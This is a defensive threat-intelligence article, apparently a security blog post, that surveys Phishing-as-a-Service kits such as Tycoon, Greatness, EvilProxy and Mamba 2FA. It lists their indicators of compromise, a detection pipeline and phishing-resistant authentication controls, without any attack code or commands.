Modern Phishing Kits: Tycoon, Greatness, EvilProxy, Mamba 2FA

Last updated: April 26, 2026

The 2024-2026 phishing landscape is dominated by Phishing-as-a-Service (PhaaS) kits. Tycoon, Greatness, EvilProxy, and a handful of similar operations sell ready-made AiTM phishing infrastructure on subscription. Operators get pre-configured M365 / Google Workspace templates, evasion features, operator dashboards, and infrastructure rotation — for $250-$1500/month. This article maps the kit ecosystem, the IoCs each kit produces, and what defensive teams should monitor.

The PhaaS economics

Building a custom AiTM phishing infrastructure requires technical skill — Evilginx2 configuration, hosting, look-alike domains, evading takedowns. PhaaS kits commodify all of this. Subscribers get:

• Web UI for campaign management
• Templates for major IdPs (Microsoft, Google, Okta, AWS, Adobe)
• Auto-rotating infrastructure (domains, IPs)
• Anti-detection features (CAPTCHA gating, geo-fencing, bot detection)
• Captured-credential dashboard with session-cookie export
• Telegram bot integration for real-time notifications

This puts AiTM phishing in reach of attackers with no technical skill. The result: scale. Indian fintech and BFSI customer-facing portals see hundreds to thousands of look-alike phishing domains active at any time.

The kits

Tycoon

One of the most active in 2024-25. Multi-tier subscription. Notable for:

• High-quality M365 phishing templates with pixel-perfect branding
• “VIP” tier with exclusive domains and faster takedown-replacement
• Captured-cookie auto-replay capability

Greatness

Microsoft 365-focused PhaaS. Heavy use of HTML smuggling for delivery (the phishing email contains an HTML attachment that reconstructs the phishing page locally, bypassing email-gateway URL scanning).

EvilProxy / Caffeine

EvilProxy was takedown’d in 2023; successor branding (Caffeine) emerged. Same technical pattern.

Mamba 2FA

Newer entrant in 2024 specifically advertising “MFA bypass” — translation: AiTM. Targets enterprise SSO providers including Okta and Auth0.

Storm-1167 / Robin Banks

Targeting financial services specifically. Storm-1167 is the Microsoft-attributed designation; Robin Banks is the operator brand.

IoCs to monitor

• Look-alike domains for your brand — punycode, hyphenated variants, TLD substitution. Run continuous detection (DNSTwist, dnsadmin, commercial brand-protection)
• HTML smuggling indicators — emails with .htm / .html attachments that reconstruct files via JavaScript
• Suspicious M365 sign-in patterns — sign-ins from anonymous proxy IPs, residential proxy ranges, recently-registered IPs
• Token replay — same session token used from two distant geographies in short window
• User agent anomalies — sign-ins with browser strings inconsistent with the user’s normal device

Detection pipeline

1. Look-alike domain monitoring — alert on registrations of domains close to your brand. Tools: Phishtank API, dnsadmin, OpenSquat, commercial brand protection (Recorded Future, BrandShield)
2. Email security with link detonation — Defender, Mimecast, Proofpoint sandbox links
3. M365 sign-in risk — Entra ID Identity Protection rules; alert on high-risk sign-ins
4. SIEM correlation — sign-in events from anomalous patterns followed by anomalous activity
5. User reporting workflow — easy “report phishing” button in mail client; investigate every report; learn the latest delivery patterns

The defender stack

• FIDO2 / passkeys for all admin accounts (kits cannot capture origin-bound credentials)
• Conditional Access with device-compliance and geo-fence
• Token Protection in Entra ID where available
• MFA push number-matching instead of just-tap (defeats MFA fatigue)
• Email security with HTML attachment scanning
• Web filter blocking known phishing infrastructure (multiple feeds: PhishTank, OpenPhish, commercial)
• User awareness with recent-kit examples (more impactful than abstract phishing training)

The takedown reality

Phishing kit operators run their infrastructure across compromised hosting, fast-flux DNS, residential proxy networks. Takedown timelines are 24-72 hours typically; the kit operator is back up the next day on different infrastructure. Defending via takedowns is whack-a-mole. Defending via FIDO2 + Conditional Access is structural.

The takeaway

PhaaS democratises AiTM phishing. The volume of campaigns hitting Indian enterprise customer-facing portals is now staggering. The defensive answer is not “block the next kit” — it is “make your authentication phishing-resistant by design.” FIDO2 + Conditional Access + Token Protection is the durable answer. Until rolled out, expect AiTM-driven account takeover incidents in your inbox.